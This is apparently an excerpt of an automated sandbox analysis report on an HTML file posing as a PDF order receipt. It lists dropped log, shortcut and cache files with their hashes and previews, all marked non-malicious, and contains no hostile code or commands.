                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.3./.1.2./.2.0.2.4. . .1.0.:.4.0.:.5.8. .=.=.=.....

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkihkxpj.qbg.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:unknown
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-03 10-40-53-275.log

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with very long lines (393)
                  Category:dropped
                  Size (bytes):16525
                  Entropy (8bit):5.359827924713262
                  Encrypted:false
                  SSDEEP:
                  MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                  SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                  SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                  SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                  Malicious:false
                  Reputation:unknown
                  Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:

                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):35721
                  Entropy (8bit):5.420408083131752
                  Encrypted:false
                  SSDEEP:
                  MD5:E3CE55E234DC13C5C6C85751720ACF5C
                  SHA1:6AB01C6E710DD160CAC4653F94093A461D091139
                  SHA-256:2D00E783E5ED1A8564C43C2E30DB4D3A8D8B830F3DFAE9CEBBB453545B938B51
                  SHA-512:368845D229A206BC7E077012526DFAA729A7A20EB06907A75ADDA97965513369EC648363A100209B6C5B70AB70E7BACADA1535FC414CE54CD84A030C15607108
                  Malicious:false
                  Reputation:unknown
                  Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 14:39:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.996050718144815
                  Encrypted:false
                  SSDEEP:
                  MD5:5702F935B9F89EFB3D96944879B9DFF8
                  SHA1:1882C6531864884543A8DCF2C0D8CFCDCA69AABC
                  SHA-256:8BDF39607081D93ACE2DED31453983130B9C98C092E40DFF35B249F1BACDD087
                  SHA-512:0941F8F176653A37147FB9EC07B1B0DC270A3D2C943F60C2003F7562939764058C5E690535CC7B275339B8C6AC4289AF3EBD23919127B32D7F76401B4F05515D
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.........E......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.|...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 14:39:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):4.0107493759959665
                  Encrypted:false
                  SSDEEP:
                  MD5:0A474D6D0E872F499F41CD6DB6E657CF
                  SHA1:6DE023229165BA7E465BB6CE0E5E97E93D960009
                  SHA-256:0DE15D2746B70CF22610AEC01AB7341B69A42DC65BB7BA8854242FF0BA62B0E0
                  SHA-512:EC0CE74754E4EEF7722ADC8360BF3516ECB1F219469A701E62B8DD7AFD8CBC9819977D9B226F5187B55C108F1D14025DC9A98C2ED8F2A98834668A89AFAA7E34
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....k...E......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.|...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2693
                  Entropy (8bit):4.021298708603718
                  Encrypted:false
                  SSDEEP:
                  MD5:9E86B5FD4A135A5F610D5F4FFC185F73
                  SHA1:E213FC99627E97BEF6407959161079D5A88D879F
                  SHA-256:F9709936DFB65CB6C46630E81EBE7818C361717CA109FC22C84C47B3B4DA1E1E
                  SHA-512:A6DF712E67F4F05DE9C4BB6B1DF2BCF3EBC60719C66DC719CEEF03EEBF0FDCFBD3264EA5C8B508E6FD6E4277BCD2444559D6F08C707FA62620267827F70D78B9
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 14:39:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2681
                  Entropy (8bit):4.011671775166932
                  Encrypted:false
                  SSDEEP:
                  MD5:6F6611484FCF9D218C9AEC298B3511E7
                  SHA1:BBB703CF9042B5A87EF6779148B117EDF710BA95
                  SHA-256:390277DFC0AA51A01CE0683520CB7E61601224067D2578E37554C6DFFFFA46A9
                  SHA-512:E6ADBA1F0E26D113D902714593092A1E9501655276F8F720543DC7DBA09527CBBDEA6BBD310838A1F4C30199F6811F2314AC8D4B7EC5BAAEA7F39D3A7E08C865
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....|...E......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.|...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 14:39:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2681
                  Entropy (8bit):4.000349783514144
                  Encrypted:false
                  SSDEEP:
                  MD5:A4C0A1C8117B0B3B4163835795D50FA0
                  SHA1:F8C0CE23B3760EFD229C0E862D66B6AA810666FB
                  SHA-256:3BAD96470D3DC1A123C64E323A374DE3C9F1C9EB452F8D3754BE7A717C4D1AAE
                  SHA-512:1C341F3D2DA4816C28A232814E5779B2564E2E3828FDE499CA9D3987B9E5BAC18E7D926FF1AA8DE468328E31E40FDAF1CF24467927C9E6BC242F81538CB3D55C
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....x....E......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.|...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 14:39:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2683
                  Entropy (8bit):4.011079211610676
                  Encrypted:false
                  SSDEEP:
                  MD5:6AB7127C973F3EA3153821E8F1DCC6A5
                  SHA1:779EB919257E195DBD2F92A43B466FE74C92E03E
                  SHA-256:0907082912069A794FE54065BEC333CFFE6BF2FDA92E487982EECCC55EED8861
                  SHA-512:223C9F545BC6C91EE7C4CF2C9A75AE2A989C14FC7F34F107059226B3B802DAB0B36AA8883AD053510C7CFF4E69ABF9E727719069C9E2575A1332FC650871506A
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....v:z..E......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.|....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.|...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.|...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............{.~.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  Chrome Cache Entry: 159

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):7584
                  Entropy (8bit):7.771402547890117
                  Encrypted:false
                  SSDEEP:
                  MD5:17956A7275630ED70C693A72B11E67F3
                  SHA1:AA600A8D3F3026816674F7DCA1D1FAE6651AEDD6
                  SHA-256:96E34D83AD7BBB7ECF150EA8DAC6544F9AB2A6FC7BD40D8300CF6D4CD7679DD2
                  SHA-512:CAA7428CA8C5ADAA405FE6E95F64992482A590B6452EE94040E0BF80E1F167000609D9795281EDA3CED0C9CD00D489F620A44E8FCC4E9C4963590D4E245384F2
                  Malicious:false
                  Reputation:unknown
                  URL:https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png
                  Preview:.PNG........IHDR.............\r.f....pHYs...........~....RIDATx..]K.e.U.U]v.u.i..J.d....Et#!.p.....I&.e..H.!..d.#ELq.Hd..0...b......x.1....E.....zos.......>.{.kI.U].[...^....3.....&>....................... ...@............................ ...@............................ ...@............................ ...@........c+..666..M~t.j..S.......*>r5.7_.....W...;..#..`..M~...4..R.....lx...vC.w.Q..%.&.i...|]..)...>....A.Y=.&...../.VJ.m>.[.(.d..+.8^..".6........2.W....=d.@..pl.!....c..Go>..oc.....).>..G&..W.....$....n.c....%....$...... .`.............@.@.[}..?.'..~........U#.j..?...@..L..@. .............-|.#..ct...n.O?{K. .....r.....w~r<.]..x...........}...%.....|...z..s....+.ic.R.5....2..e....~......4........@.........H..jV.T.`.}..}..o0Ki.._7$pw...........T......-...P8A*../......y......._...=.?.._J.-.O..O...........~..H.........f..{.........Vb..........6S`..7..D$..@;~..2..@..g...o...U...d.......TR...........1.sf..[..../..!x2.....&h$.?[.....^....../..k.....M?.k

                  Static File Info

                  General

                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):0.014464875296674784
                  TrID:
                    File name:Belegdetails Nr378-938-027181-PDF.html
                    File size:820'233 bytes
                    MD5:25addaac28d004af8763a737c9c848d1
                    SHA1:ecfd2185c16f08820ee4a143e4acc2a2fbadce52
                    SHA256:ca16452d778ca4a40af50ae2e47ce1af5b00f94f870ed88632bb0cc618065631
                    SHA512:a9eaaa6726ebe5b4b21fa423e82923eced9a0b7d3ff177c6becbe872a1064cbc8397594ce8c89d4d4af3767b3123b517fc1a20790412b1a45a10146ec7eac366
                    SSDEEP:12:FF21pDgqunpDvjFMxik+jIk6/BJ5GzqjIk6/BJ5sjIk67X:Fwbg79bFMxik+jR6Z4qjR6Z4jR6T
                    TLSH:1E05FE730251A849F7324B3A805631ECD2B2F843D0C83910B2A9535C5BF0617CE9784A
                    File Content Preview:<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png">....<meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> .. <title>Order Receipt</title>.... <meta h

                    File Icon

                    Icon Hash:173149cccc490307